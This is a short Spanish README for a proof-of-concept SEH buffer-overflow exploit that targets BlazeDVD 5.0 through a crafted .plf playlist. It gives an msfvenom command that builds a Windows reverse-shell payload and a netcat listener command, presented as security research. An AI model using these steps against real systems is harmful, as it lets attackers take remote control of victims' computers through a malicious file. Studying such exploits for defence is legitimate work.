
Prueba de concepto de exploit de desbordamiento de búfer SEH para BlazeDVD 5.0 mediante un archivo de lista de reproducción .plf manipulado, generando un payload de shell reversa con msfvenom para fines educativos de investigación en seguridad.
Exploit de Prueba de Concepto (PoC) dirigido a una vulnerabilidad de desbordamiento de búfer en BlazeDVD versión 5.0 mediante un archivo de lista de reproducción .plf manipulado. El exploit utiliza sobrescritura SEH (Manejador de Excepciones Estructurado) para lograr la ejecución de código.
.plfEste código es solo para fines educativos y de investigación. Cualquier mal uso de este código puede violar leyes locales o internacionales. No asumo ninguna responsabilidad por daños causados por un uso inadecuado.
El exploit genera un archivo .plf malicioso que, al abrirse en BlazeDVD, desencadena un desbordamiento de búfer y sobrescribe el SEH (Manejador de Excepciones Estructurado), redirigiendo la ejecución a un payload de shell inversa.
Generar el shellcode con msfvenom
Use msfvenom para crear un payload de shell inversa en formato raw, evitando caracteres malos.
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=8443 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
Reemplace el shellcode dentro del script del exploit con la salida de msfvenom.
Iniciar Netcat (Listener) En otra terminal, comience a escuchar en el puerto seleccionado 8443:
nc -lvnp 8443
Capturar la shell inversa Si tiene éxito, una shell inversa se conectará a su listener.